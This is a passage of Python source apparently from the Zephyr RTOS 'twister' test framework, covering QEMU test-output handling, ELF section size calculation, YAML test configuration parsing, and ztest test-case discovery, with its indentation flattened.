in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
#there's possibility we polled nothing because
#of not enough CPU time scheduled by host for
#QEMU process during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
if harness.is_pytest:
harness.handle(None)
out_state = harness.state
break
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug(f"QEMU ({pid}): {line}")
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
if harness.is_pytest:
harness.pytest_run(logfile)
out_state = harness.state
handler_time = time.time() - start_time
logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds")
handler.instance.execution_time = handler_time
if out_state == "timeout":
handler.instance.status = "failed"
handler.instance.reason = "Timeout"
elif out_state == "failed":
handler.instance.status = "failed"
handler.instance.reason = "Failed"
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.status = "failed"
handler.instance.reason = out_state
else:
handler.instance.status = out_state
handler.instance.reason = "Unknown"
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testsuite.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
qemu_pid = None
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle SIGTERM signal correctly
# in that case kill -9 QEMU process directly and leave
# twister to judge testing result by console output
is_timeout = True
self.terminate(proc)
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join(0)
if self.thread.is_alive():
logger.debug("Timed out while monitoring QEMU output")
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.instance.status = "failed"
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
self.instance.add_missing_testscases("blocked")
self._final_handle_actions(harness, 0)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise TwisterRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise TwisterRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class TwisterConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new TwisterConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.twister = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.timeout_multiplier = 1.0
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = TwisterConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.twister = data.get("twister", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.timeout_multiplier = testing.get("timeout_multiplier", 1.0)
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class ScanPathResult:
"""Result of the TestSuite.scan_path function call.
Attributes:
matches A list of test cases
warnings A string containing one or more
warnings to display
has_registered_test_suites Whether or not the path contained any
calls to the ztest_register_test_suite
macro.
has_run_registered_test_suites Whether or not the path contained at
least one call to
ztest_run_registered_test_suites.
has_test_main Whether or not the path contains a
definition of test_main(void)
ztest_suite_names Names of found ztest suites
"""
def __init__(self,
matches: List[str] = None,
warnings: str = None,
has_registered_test_suites: bool = False,
has_run_registered_test_suites: bool = False,
has_test_main: bool = False,
ztest_suite_names: List[str] = []):
self.matches = matches
self.warnings = warnings
self.has_registered_test_suites = has_registered_test_suites
self.has_run_registered_test_suites = has_run_registered_test_suites
self.has_test_main = has_test_main
self.ztest_suite_names = ztest_suite_names
def __eq__(self, other):
if not isinstance(other, ScanPathResult):
return False
return (sorted(self.matches) == sorted(other.matches) and
self.warnings == other.warnings and
(self.has_registered_test_suites ==
other.has_registered_test_suites) and
(self.has_run_registered_test_suites ==
other.has_run_registered_test_suites) and
self.has_test_main == other.has_test_main and
(sorted(self.ztest_suite_names) ==
sorted(other.ztest_suite_names)))
class TestCase(DisablePyTestCollectionMixin):
def __init__(self, name=None, testsuite=None):
self.duration = 0
self.name = name
self.status = None
self.reason = None
self.testsuite = testsuite
self.output = ""
def __lt__(self, other):
return self.name < other.name
def __repr__(self):
return "<TestCase %s with %s>" % (self.name, self.status)
def __str__(self):
return self.name
class TestSuite(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testsuite_root, workdir, name):
"""TestSuite constructor.
This gets called by TestPlan as it finds and reads test yaml files.
Multiple TestSuite instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testsuite_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testsuite_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.testcases = []
self.name = self.get_unique(testsuite_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.platform_type = []
self.toolchain_exclude = None
self.toolchain_allow = None
self.ts_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
self.ztest_suite_names = []
def add_testcase(self, name):
tc = TestCase(name=name, testsuite=self)
self.testcases.append(tc)
@staticmethod
def get_unique(testsuite_root, workdir, name):
canonical_testsuite_root = os.path.realpath(testsuite_root)
if Path(canonical_zephyr_base) in Path(canonical_testsuite_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testsuite_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise TwisterException(f"""bad test name '{name}' in {testsuite_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
def scan_file(self, inf_name):
regular_suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
registered_suite_regex = re.compile(
br"^\s*ztest_register_test_suite"
br"\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
new_suite_regex = re.compile(
br"^\s*ZTEST_SUITE\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
# Checks if the file contains a definition of "void test_main(void)"
# Since ztest provides a plain test_main implementation it is OK to:
# 1. register test suites and not call the run function iff the test
# doesn't have a custom test_main.
# 2. register test suites and a custom test_main definition iff the test
# also calls ztest_run_registered_test_suites.
test_main_regex = re.compile(
br"^\s*void\s+test_main\(void\)",
re.MULTILINE)
registered_suite_run_regex = re.compile(
br"^\s*ztest_run_registered_test_suites\("
br"(\*+|&)?(?P<state_identifier>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
warnings = None
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
regular_suite_regex_matches = \
[m for m in regular_suite_regex.finditer(main_c)]
registered_suite_regex_matches = \
[m for m in registered_suite_regex.finditer(main_c)]
new_suite_regex_matches = \
[m for m in new_suite_regex.finditer(main_c)]
if registered_suite_regex_matches:
has_registered_test_suites = True
if registered_suite_run_regex.search(main_c):
has_run_registered_test_suites = True
if test_main_regex.search(main_c):
has_test_main = True
if regular_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(regular_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, regular_suite_regex_matches, has_registered_test_suites)
elif registered_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(registered_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, registered_suite_regex_matches, has_registered_test_suites)
elif new_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(new_suite_regex_matches)
testcase_names, warnings = \
self._find_new_ztest_testcases(main_c)
else:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
ztest_suite_names = []
testcase_names, warnings = None, None
return ScanPathResult(
matches=testcase_names,
warnings=warnings,
has_registered_test_suites=has_registered_test_suites,
has_run_registered_test_suites=has_run_registered_test_suites,
has_test_main=has_test_main,
ztest_suite_names=ztest_suite_names)
@staticmethod
def _extract_ztest_suite_names(suite_regex_matches):
ztest_suite_names = \
[m.group("suite_name") for m in suite_regex_matches]
ztest_suite_names = \
[name.decode("UTF-8") for name in ztest_suite_names]
return ztest_suite_names
def _find_regular_ztest_testcases(self, search_area, suite_regex_matches, is_registered_test_suite):
"""
Find regular ztest testcases like "ztest_unit_test" or similar. Return
testcases' names and eventually found warnings.
"""
testcase_regex = re.compile(
br"""^\s* # empty space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
# ztest_register_test_suite(n, p, ztest_user_unit_test(TESTNAME),
(?:ztest_
(?:test_suite\(|register_test_suite\([a-zA-Z0-9_]+\s*,\s*)
[a-zA-Z0-9_]+\s*,\s*
)?
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?
# Consume the argument that becomes the extra testcase
\(\s*(?P<testcase_name>[a-zA-Z0-9_]+)
# _setup_teardown() variant has two extra arguments that we ignore
(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?
\s*\)""",
# We don't check how it finishes; we don't care
re.MULTILINE | re.VERBOSE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
search_start, search_end = \
self._get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite)
limited_search_area = search_area[search_start:search_end]
testcase_names, warnings = \
self._find_ztest_testcases(limited_search_area, testcase_regex)
achtung_matches = re.findall(achtung_regex, limited_search_area)
if achtung_matches and warnings is None:
achtung = ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
warnings = f"found invalid {achtung} in ztest_test_suite()"
return testcase_names, warnings
@staticmethod
def _get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite):
"""
Get search area boundary based on "ztest_test_suite(...)",
"ztest_register_test_suite(...)" or "ztest_run_test_suite(...)"
functions occurrence.
"""
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
search_start = suite_regex_matches[0].end()
suite_run_match = suite_run_regex.search(search_area)
if suite_run_match:
search_end = suite_run_match.start()
elif not suite_run_match and not is_registered_test_suite:
raise ValueError("can't find ztest_run_test_suite")
else:
search_end = re.compile(br"\);", re.MULTILINE) \
.search(search_area, search_start) \
.end()
return search_start, search_end
def _find_new_ztest_testcases(self, search_area):
"""
Find regular ztest testcases like "ZTEST" or "ZTEST_F". Return
testcases' names and eventually found warnings.
"""
testcase_regex = re.compile(
br"^\s*(?:ZTEST|ZTEST_F)\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,"
br"\s*(?P<testcase_name>[a-zA-Z0-9_]+)\s*",
re.MULTILINE)
return self._find_ztest_testcases(search_area, testcase_regex)
@staticmethod
def _find_ztest_testcases(search_area, testcase_regex):
"""
Parse search area and try to find testcases defined in testcase_regex
argument. Return testcase names and eventually found warnings.
"""
testcase_regex_matches = \
[m for m in testcase_regex.finditer(search_area)]
testcase_names = \
[m.group("testcase_name") for m in testcase_regex_matches]
testcase_names = [name.decode("UTF-8") for name in testcase_names]
warnings = None
for testcase_name in testcase_names:
if not testcase_name.startswith("test_"):
warnings = "Found a test that does not start with test_"
testcase_names = \
[tc_name.replace("test_", "", 1) for tc_name in testcase_names]
return testcase_names, warnings
def scan_path(self, path):
subcases = []
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
ztest_suite_names = []
src_dir_path = self._find_src_dir_path(path)
for filename in glob.glob(os.path.join(src_dir_path, "*.c*")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
raise TwisterRuntimeError(
"%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.has_registered_test_suites:
has_registered_test_suites = True
if result.has_run_registered_test_suites:
has_run_registered_test_suites = True
if result.has_test_main:
has_test_main = True
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
if (has_registered_test_suites and has_test_main and
not has_run_registered_test_suites):
warning = \
"Found call to 'ztest_register_test_suite()' but no "\
"call to 'ztest_run_registered_test_suites()'"
logger.error(warning)
raise TwisterRuntimeError(warning)
return subcases, ztest_suite_names
def parse_subcases(self, test_path):
subcases, ztest_suite_names = self.scan_path(test_path)
# if testcases are provided as part of the yaml, skip this step.
if not self.testcases:
# only add each testcase once
for sub in set(subcases):
name = "{}.{}".format(self.id, sub)
self.add_testcase(name)
if not subcases:
self.add_testcase(self.id)
self.ztest_suite_names = ztest_suite_names
@staticmethod
def _find_src_dir_path(test_dir_path):
"""
Try to find src directory with test source code. Sometimes due to the
optimization reasons it is placed in upper directory.
"""
src_dir_name = "src"
src_dir_path = os.path.join(test_dir_path, src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
src_dir_path = os.path.join(test_dir_path, "..", src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
return ""
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestSuite on a platform
@param test The TestSuite object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testsuite, platform, outdir):
self.testsuite = testsuite
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.execution_time = 0
self.name = os.path.join(platform.name, testsuite.name)
self.run_id = self._get_run_id()
self.build_dir = os.path.join(outdir, platform.name, testsuite.name)
self.run = False
self.testcases = []
self.init_cases()
# Fix an issue with copying objects from testsuite, need better solution.
def init_cases(self):
for c in self.testsuite.testcases:
self.add_testcase(c.name)
def _get_run_id(self):
""" generate run id from instance unique identifier and a random
number"""
hash_object = hashlib.md5(self.name.encode())
random_str = f"{random.getrandbits(64)}".encode()
hash_object.update(random_str)
return hash_object.hexdigest()
def add_missing_testscases(self, status, reason=None):
for case in self.testcases:
if not case.status:
case.status = status
if reason:
case.reason = reason
else:
case.reason = self.reason
def __getstate__(self):
d = self.__dict__.copy()
return d
def __setstate__(self, d):
self.__dict__.update(d)
def __lt__(self, other):
return self.name < other.name
def set_case_status_by_name(self, name, status, reason=None):
tc = self.get_case_or_create(name)
tc.status = status
if reason:
tc.reason = reason
return tc
def add_testcase(self, name):
tc = TestCase(name=name)
self.testcases.append(tc)
return tc
def get_case_by_name(self, name):
for c in self.testcases:
if c.name == name:
return c
return None
def get_case_or_create(self, name):
for c in self.testcases:
if c.name == name:
return c
logger.debug(f"Could not find a matching testcase for {name}")
tc = TestCase(name=name)
self.testcases.append(tc)
return tc
@staticmethod
def testsuite_runnable(testsuite, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testsuite.harness in [ 'console', 'ztest', 'pytest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testsuite.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testsuite.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testsuite.build_only:
return False
# Do not run slow tests:
skip_slow = self.testsuite.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testsuite.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim", "armfvp", "xt-sim"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testsuite_runnable = self.testsuite_runnable(self.testsuite, fixtures)
return testsuite_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "twister/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "twister")
content = ""
if self.testsuite.extra_configs:
content = "\n".join(self.testsuite.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testsuite_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if '_pre' not in x]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testsuite.extra_sections)
def __repr__(self):
return "<TestSuite %s on %s>" % (self.testsuite.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testsuite, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testsuite = testsuite
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
self.default_encoding = sys.getdefaultencoding()
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
